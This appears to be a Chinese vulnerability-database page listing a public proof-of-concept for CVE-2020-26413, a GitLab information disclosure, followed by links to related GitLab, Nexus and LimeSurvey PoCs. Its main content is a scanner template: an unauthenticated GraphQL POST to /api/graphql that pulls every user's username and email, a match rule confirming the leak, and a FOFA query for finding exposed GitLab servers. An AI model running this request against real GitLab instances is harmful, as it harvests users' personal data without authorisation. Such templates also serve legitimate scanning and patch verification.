CVE-2020-26413: GitLab Information Disclosure

漏洞描述

PoC代码[已公开]

id: CVE-2020-26413

info:
    name: GitLab Information Disclosure
    author: Print1n(https://github.com/Print1n)
    severity: medium
    description: fofa app="GitLab"

rules:
    r0:
        request:
            method: POST
            path: /api/graphql
            headers:
                Content-Type: application/json
            body: '{"query":"{\nusers {\nedges {\n  node {\n    username\n    email\n    avatarUrl\n    status {\n      emoji\n      message\n      messageHtml\n     }\n    }\n   }\n  }\n }","variables":null,"operationName":null}'
        expression: response.status == 200 && "x-runtime" in response.headers && response.body.bcontains(b"{\"data\":{\"users\":{\"edges\":[{\"node\":{\"username\":\"") && "\",\"email\":\"[^\"]+@[^\"]+\"".bmatches(response.body)
expression: r0()

相关漏洞推荐

• CVE-2021-22205: GitLab CE/EE Unauthenticated RCE Using ExifTool POC

  2025-09-01 | GitLab CE EE
  An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was n...

• gitlab-weak-login: Gitlab Default Login POC

  2025-09-01 | Gitlab
  Gitlab default login credentials were discovered.

• gitlab-panel: GitLab Panel POC

  2025-09-01 | GitLab Panel
  fofa app="GitLab"

• CVE-2020-10199: Nexus Repository before 3.21.2 allows JavaEL Injection POC

  2025-09-01 | Nexus Repository
  漏洞触发需要任意账户权限 body="Nexus Repository Manager" app="Nexus-Repository-Manager"

• CVE-2020-11455: LimeSurvey 4.1.11 - Path Traversal POC

  2025-09-01 | LimeSurvey
  LimeSurvey before 4.1.12+200324 contains a path traversal vulnerability in application/controllers/a...